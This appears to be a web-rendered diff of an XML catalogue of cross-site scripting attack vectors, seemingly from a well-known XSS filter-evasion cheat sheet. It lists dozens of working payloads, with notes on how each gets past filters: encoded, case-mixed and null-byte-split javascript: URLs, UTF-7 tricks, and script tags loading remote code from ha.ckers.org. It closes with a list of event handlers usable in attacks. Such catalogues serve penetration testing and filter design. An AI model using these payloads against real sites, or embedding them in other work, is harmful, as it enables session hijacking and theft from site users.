- <desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Protocol resolution in script tags</name>
- <code><SCRIPT SRC=//ha.ckers.org/.j></code>
- <desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Half-Open HTML/JavaScript</name>
- <code><IMG SRC="javascript:alert('XSS')"</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+\u003C</code>
+ <desc>All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Case Insensitive</name>
+ <code><IMG SRC=JaVaScRiPt:alert('XSS')></code>
+ <desc>Case insensitive XSS attack vector.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>HTML Entities</name>
+ <code><IMG SRC=javascript:alert(&quot;XSS&quot;)></code>
+ <desc>HTML entities (the semicolons are required for this to work).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Grave Accents</name>
+ <code><IMG SRC=`javascript:alert("RSnake says, 'XSS'")`></code>
+ <desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Image w/CharCode</name>
+ <code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code>
+ <desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>UTF-8 Unicode Encoding</name>
+ <code><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;></code>
+ <desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Long UTF-8 Unicode w/out Semicolons</name>
+ <code><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></code>
+ <desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV w/Unicode</name>
+ <code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code>
+ <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Hex Encoding w/out Semicolons</name>
+ <code><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></code>
+ <desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>UTF-7 Encoding</name>
+ <code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code>
+ <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Escaping JavaScript escapes</name>
+ <code>\";alert('XSS');//</code>
+ <desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>End title tag</name>
+ <code></TITLE><SCRIPT>alert("XSS");</SCRIPT></code>
+ <desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/broken up JavaScript</name>
+ <code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></code>
+ <desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Tab</name>
+ <code><IMG SRC="jav	ascript:alert('XSS');"></code>
+ <desc>Embedded tab to break up the cross site scripting attack.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Encoded Tab</name>
+ <code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code>
+ <desc>Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Newline</name>
+ <code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code>
+ <desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Carriage Return</name>
+ <code><IMG SRC="jav&#x0D;ascript:alert('XSS');"></code>
+ <desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Multiline w/Carriage Returns</name>
+ <code><IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
</code>
+ <desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Null Chars 1</name>
+ <code>perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out</code>
+ <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Null Chars 2</name>
+ <code>perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out</code>
+ <desc>Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Spaces/Meta Chars</name>
+ <code><IMG SRC=" &#14; javascript:alert('XSS');"></code>
+ <desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal).</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Non-Alpha/Non-Digit</name>
+ <code><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
+ <desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s"</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Non-Alpha/Non-Digit Part 2</name>
+ <code><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></code>
+ <desc>Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>No Closing Script Tag</name>
+ <code><SCRIPT SRC=http://ha.ckers.org/xss.js</code>
+ <desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Protocol resolution in script tags</name>
+ <code><SCRIPT SRC=//ha.ckers.org/.j></code>
+ <desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Half-Open HTML/JavaScript</name>
+ <code><IMG SRC="javascript:alert('XSS')"</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/
-As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Double open angle brackets</name>
- <code><IFRAME SRC=http://ha.ckers.org/scriptlet.html <</code>
- <desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Extraneous Open Brackets</name>
- <code><<SCRIPT>alert("XSS");//<</SCRIPT></code>
- <desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Malformed IMG Tags</name>
- <code><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></code>
- <desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>No Quotes/Semicolons</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/
+As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Double open angle brackets</name>
+ <code><IFRAME SRC=http://ha.ckers.org/scriptlet.html <</code>
+ <desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Extraneous Open Brackets</name>
+ <code><<SCRIPT>alert("XSS");//<</SCRIPT></code>
+ <desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Malformed IMG Tags</name>
+ <code><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></code>
+ <desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>No Quotes/Semicolons</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><SCRIPT>a=/XSS/
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-alert(a.source)</SCRIPT></code>
- <desc>No single quotes or double quotes or semicolons.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Event Handlers List 1</name>
- <code>See Below</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+alert(a.source)</SCRIPT></code>
+ <desc>No single quotes or double quotes or semicolons.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Event Handlers List 1</name>
+ <code>See Below</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -FSCommand() (execute from within an embedded Flash object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onAbort() (when user aborts the loading of an image)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onActivate() (when object is set as the active element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onAfterPrint() (activates after user prints or previews print job)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onAfterUpdate() (activates on data object after updating data in the source object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeActivate() (fires before the object is set as the active element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand("Copy") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeCut() (attacker executes the attack string right before a selection is cut)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBegin() (fires immediately when the element's timeline begins)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBlur() (in the case where another popup is loaded and window loses focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onCellChange() (fires when data changes in the data provider)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onClick() (fires when someone clicks on a form)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onContextMenu() (user would need to right click on attack area)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onControlSelect() (fires when the user is about to make a control selection of the object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
